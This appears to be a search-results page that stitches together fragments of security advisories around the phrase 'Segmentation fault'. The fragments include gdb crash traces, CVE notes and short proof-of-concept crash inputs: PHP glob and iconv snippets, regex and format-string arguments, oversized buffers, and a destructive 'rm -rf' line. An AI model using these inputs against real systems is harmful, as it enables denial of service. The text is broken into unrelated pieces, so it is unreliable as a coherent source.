Next Page >>
Segmentation fault
return 0;
}
# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
127# pwd
/home/cxib
127# du /home/
4 /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
They are many vectors attack
grep(1):
cx@cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
pgrep(1):
cx@cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
we need use 1..8000 or bigger value to make stack overflow.
in result
# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
and compile it, we can manipulate format string.
Let's try to run example:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
What is wrong? Let's see
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %99999999999999999999n
uint8 padding_length;
};
*/
} GenericBlockCipher;
This will cause a segmentation fault, when the ciphertext_to_compressed
function tries to give decrypted data to _gnutls_auth_cipher_add_auth for HMAC
verification, even though the data length is invalid, and it should have
returned GNUTLS_E_DECRYPTION_FAILED or GNUTLS_E_UNEXPECTED_PACKET_LENGTH
instead, before _gnutls_auth_cipher_add_auth was called.
iconv(1, $a, 1);
?>
(gdb)run 1.php
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1217608000 (LWP 29444)]
0xb76ed3e5 in iconv_close () from /lib/tls/libc.so.6
2) iconv_mime_decode_headers()
to see difference
[cx@82 /www]$ php define.php 8999999
Out of memory
[cx@82 /www]$ php define.php 9999999
Segmentation fault: 11
(gdb) bt
#0 0x28745eb0 in strrchr () from /lib/libc.so.7
#1 0x0822d538 in zend_register_constant (c=0xbfbfcfb0)
at /usr/ports/lang/php5/work/php/Zend/zend_constants.c:429
Execution of code : NO
Privilege scalation : NO
Discovered by : INTECO-CERT - David Reguera Garcia <david.reguera@inteco.es>
Exploit by : INTECO-CERT - David Reguera Garcia <david.reguera@inteco.es>
Description : When elfdump analyzes an "evil" elf, the application crashes
and causes a Segmentation fault: 11
Affected OS:
- FreeBSD:
- 5.5 - TESTED AND FOUND
- 6.2 - TESTED AND FOUND
- 6.3 - TESTED AND FOUND
<?php
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("*",333333),0x39);
?>cx@cx64:/www$ php zip.php
Segmentation fault
---linux/ubuntu---
Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6)
Loaded symbols for /usr/libexec/ld.so
0x001f39e9 in select () from /usr/lib/libc.so.58.0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0026d951 in memcpy () from /usr/lib/libc.so.58.0
crash in regcomp()
..
in.str = malloc((e - s) + YYMAXFILL);
memset(in.str, 0, (e - s) + YYMAXFILL);
memcpy(in.str, s, (e - s));
Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c <memset+44>: rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0: Cannot access memory at address 0x0
...
}
--- CUT ---
Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.
This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault (Denial of Service attack).
Unfortunately I couldn't find any binaries where .rodata section before the base64_reverse_table
table cause this situation.
I have added some extra debug in the lighttpd source code to see if this vulnerability is
executed correctly. Here is output for one of the example:
tell()
telldir()
When given a wrong number of arguments, those functions will
attempt to perform a comparison between an unalocated memory
zone and a given register, resulting in a segmentation fault:
jonathan@blackbox:~/test$ cat poc1.pl
#!/usr/bin/perl
$a =
getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
application to stop running unexpectedly
for example:
Anon@localhost % flv2mpeg4 Video.flv Video.mpg
Segmentation fault (core dumped)
in this mpg extension is incorrect
Anon@localhost % flv2mpeg4 Video.flv `perl -e '{print "A"x4000,".avi"}'`
Segmentation fault (core dumped)
This pointer is finally used in floating point arithmetic to read a
pointer
into the FPU stack from an unmapped location, resulting in an
unvalid pointer
dereference and in fine in a segmentation fault:
Program received signal SIGSEGV, Segmentation fault.
- -------------------------------------------------------------------------[
regs]
(gdb) r -X
Starting program: /usr/local/apache/bin/httpd -X
[Sun Dec 27 05:03:19 2009] [alert] httpd: Could not determine the server's fully
qualified domain name, using 127.0.0.1 for ServerName
Program received signal SIGSEGV, Segmentation fault.
0x0000003fec682958 in memcpy () from /lib64/libc.so.6
Missing separate debuginfos, use: debuginfo-install expat-2.0.1-6.fc11.1.x86_64
glibc-2.10.1-5.x86_64 nss-softokn-freebl-3.12.4-3.fc11.x86_64
(gdb) bt
#0 0x0000003fec682958 in memcpy () from /lib64/libc.so.6
\[x4141414141414109].\[x4141414141414108].\[x4141414141410e41].\[x4141414141414141].\[x4138414141414141].\[x4141414141414141].\[x4141414141414141].\[x4141414141414141].\[x4141414141414141].\[x4141414141414141].AAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.cos.pl
0 1 1 50 50 50
) = 318
fflush(0x40187860) = 0
strcpy(0x81f0660, "\\[x4141414141414109].\\[x41414141"...) = 0x81f0660
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[root@lost-coder mtr-0.72]# gdb -q ./mtr core
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from /lib/libresolv.so.2...done.
Loaded symbols for /lib/libresolv.so.2
- ---
will crash for differ value. example {2444492804, 2147483648,
2147483649, 2554462209} (when rdi out off band (range 2to31 2to32 under 64bits linux)
Program received signal SIGSEGV, Segmentation fault.
0x00007fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*,
int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
(gdb) bt
#0 0x00007fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned
short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#2 0x00000000006e986a in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7eb7068)
at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316
#3 0x00000000006c0b00 in execute (op_array=0x1168568) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:107
..
Program received signal SIGSEGV, Segmentation fault.
0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x1169400 "9223372036854775808", flags=32767,
error=0xffffffff00000000) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65
65 n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;
(gdb) print za->cdir->nentry
Cannot access memory at address 0x8
22/06/2010 14:53:36.650 editcp (372968) Recibida seal (sig=11).
bash-3.2# /tmp/dbx -C core
reading symbolic information ...warning: no source compiled with -g
Segmentation fault in lsConnectionCached at 0x10008298
0x10008298 (lsConnectionCached+0x54) 7d69582e lwzx r11,r9,r11
(/tmp/dbx) where
lsConnectionCached(0x41ffffff) at 0x10008298
SOCKSclose(0x41ffffff) at 0x10006548
mbstring.func_overload setting within .htaccess, which causes this
setting to be applied to other virtual hosts on the same server.
CVE-2009-1271
The JSON_parser function allows a denial of service (segmentation fault)
via a malformed string to the json_decode API function.
Furthermore, two updates originally scheduled for the next point update for
oldstable are included in the etch package:
* Date: 10/12/2008
* Software: Sophos SAVScan 4.33.0 for Linux
--[ Synopsis:
Sophos Antivirus deterministically crashes (segmentation fault)
when analyzing corrupted packed files for multiple packers :
armadillo, asprotect, asprotectSKE. The same behavior has also
been observed when analyzing corrupted CAB files.
TERM TSTP], 8) = 0
16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP],
NULL, 8) = 0
16147 fcntl64(26, F_SETFL, O_RDWR|O_NONBLOCK) = 0
16147 time(NULL) = 1245456547
16147 --- SIGSEGV (Segmentation fault) @ 0 (0) ---
16147 time(NULL) = 1245456547
16147 write(2, "090620 2:09:07 - mysqld got sig"..., 266) = 266
16147 write(2, "We will try our best to scrape u"..., 176) = 176
16147 write(2, "key_buffer_size=8388600\n", 24) = 24
16147 write(2, "read_buffer_size=131072\n", 24) = 24
> Resource id: 0x0
> Failed to open device
> (no debugging symbols found)
> [...]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1234381104 (LWP 5982)]
> 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.
I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
circumstances in which the attacker can modify or add database entries
but does not have permissions to truncate the file (CVE-2008-7068).
The JSON_parser function (ext/json/JSON_parser.c) in PHP 5.2.x
before 5.2.9 allows remote attackers to cause a denial of service
(segmentation fault) via a malformed string to the json_decode API
function (CVE-2009-1271).
- Fixed upstream bug #48378 (exif_read_data() segfaults on certain
corrupted .jpeg files) (CVE-2009-2687).
When fed with an html page featuring a very large SIZE parameter
in the SELECT tag, Opera deterministically segfaults on the
following instruction:
Program received signal SIGSEGV, Segmentation fault.
-----------------------------------------------------------------[regs]
eax:00000000 ebx:786C7FF8 ecx:0000001D edx:00000008 eflags:00010206
esi:5E063FF8 edi:00368084 esp:BFE5672C ebp:BFE56738 eip:080BACEB
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t s z a P c
[0073:080BACEB]---------------------------------------------------[code]
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 1080238208 (LWP 2461)]
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1080238208 (LWP 2461)]
0x42424242 in ?? ()
(gdb) info registers
eax 0x1 1
ecx 0x8068430 134644784
> ?>
>
> result:
> (gdb) run ./3.php
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1215031616 (LWP 11156)]
> 0xb79d3a5a in globfree () from /lib/tls/i686/cmov/libc.so.6
>
>
> ========
/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/
/*** 2003 / 12 /23 - PRIVATE CODE ***/
/*** Program terminated with signal 11, Segmentation fault. ***/
/*** #0 0xbeefdead in ?? () ***/
/***********************************************************************************/
Next Page>>
|
